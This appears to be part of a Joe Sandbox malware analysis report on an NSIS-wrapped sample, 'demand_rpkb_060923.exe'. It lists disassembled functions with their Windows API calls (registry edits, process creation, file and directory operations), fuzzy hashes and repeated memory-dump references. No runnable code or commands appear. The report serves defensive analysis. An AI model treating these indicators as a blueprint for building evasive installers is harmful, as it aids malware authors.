Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6
API String ID: 1892508949-8972102
Opcode ID: 041779a8a2318829b76c0de7385eb177e3377f4a63b096d361c7e69694586e33
Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
Opcode Fuzzy Hash: 041779a8a2318829b76c0de7385eb177e3377f4a63b096d361c7e69694586e33
Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Arbejdsdatabasens Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,745CFA90,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,745CFA90,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BD0
GetFileAttributesA.KERNELBASE(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,745CFA90,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,745CFA90,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BE0

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B7D

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 3248276644-2382934351
Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405796 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
CloseHandle.KERNEL32(?), ref: 004057CC

Strings

Error launching installer, xrefs: 004057A9

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00402476 Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0040AC38,00000023,00000011,00000002), ref: 004024C1
RegSetValueExA.KERNELBASE(?,?,?,?,0040AC38,00000000,00000011,00000002), ref: 00402501
RegCloseKey.ADVAPI32(?,?,?,0040AC38,00000000,00000011,00000002), ref: 004025E5

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 2f7030f0fa3b3f81801deef30619fdda46bcb12026f45b688bcb3dfaa3e67e09
Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
Opcode Fuzzy Hash: 2f7030f0fa3b3f81801deef30619fdda46bcb12026f45b688bcb3dfaa3e67e09
Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28

Uniqueness

Uniqueness Score: -1.00%

Function 00402588 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
RegCloseKey.ADVAPI32(?,?,?,0040AC38,00000000,00000011,00000002), ref: 004025E5

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 268a6ac687d33b3b75deecd2f678e198ea3c54c650fbd8906de0e0c6fe85c4b4
Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
Opcode Fuzzy Hash: 268a6ac687d33b3b75deecd2f678e198ea3c54c650fbd8906de0e0c6fe85c4b4
Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629

Uniqueness

Uniqueness Score: -1.00%

Function 00402516 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
RegCloseKey.ADVAPI32(?,?,?,0040AC38,00000000,00000011,00000002), ref: 004025E5

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 85140fac17cb2206fd901024402b0c0d7e23370aea13898195b4ffcefe65e270
Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
Opcode Fuzzy Hash: 85140fac17cb2206fd901024402b0c0d7e23370aea13898195b4ffcefe65e270
Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00402421 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
RegCloseKey.ADVAPI32(00000000), ref: 0040244B

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 369b8521fd3727a6f18a6f426b14a731daaca5fdb116f04809070f890cdd1b6d
Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
Opcode Fuzzy Hash: 369b8521fd3727a6f18a6f426b14a731daaca5fdb116f04809070f890cdd1b6d
Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00401705 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetShortPathNameA.KERNEL32 ref: 00401714
SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?), ref: 00401733

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Path$NameSearchShort
String ID:
API String ID: 2550640254-0
Opcode ID: ba93eb222106afb657dbde3d08028fc2d882de73066cd46c6f57abe443270a0f
Instruction ID: 927893af7881454c3bf9e78f53bf5f57cfa2d9ca593e654b45ace928972ea08a
Opcode Fuzzy Hash: ba93eb222106afb657dbde3d08028fc2d882de73066cd46c6f57abe443270a0f
Instruction Fuzzy Hash: F9F09071308344EFD320DF249E49BAB7B68DF51318F2041BBF641A60C2D6B899069A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00406500 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C90 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\demand_rpkb_060923.exe,80000000,00000003), ref: 00405C94
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405C6B Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405761 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D

Uniqueness

Uniqueness Score: -1.00%

Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?), ref: 00401733

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 494b5def1bd5c1e78d03dea1bbdf7f3f3385b450d76fb137c9487c66400b5d55
Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
Opcode Fuzzy Hash: 494b5def1bd5c1e78d03dea1bbdf7f3f3385b450d76fb137c9487c66400b5d55
Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D

Uniqueness

Uniqueness Score: -1.00%

Function 00405FAB Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
